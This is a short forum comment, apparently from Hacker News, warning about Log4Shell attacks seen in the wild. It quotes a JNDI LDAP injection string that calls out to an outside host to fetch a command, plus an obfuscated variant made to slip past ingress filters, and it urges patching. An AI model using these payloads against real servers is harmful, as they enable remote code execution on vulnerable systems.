|
|
|
|
|
|
by bArray
1650 days ago
|
|
|
Can confirm this also: ${jndi:ldap://45.155.205.xxx:12 344/Basic/Command/Base64/<base64>}
> Patch your tools, folks. If you can't do that, modify your ingress services and have them filter out stuff like this.Note that the filtering may not work, I am already seeing some variations of mitigation by the attackers: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.xxx:12344/Basic/Command/Base64/<base64>
|
|
|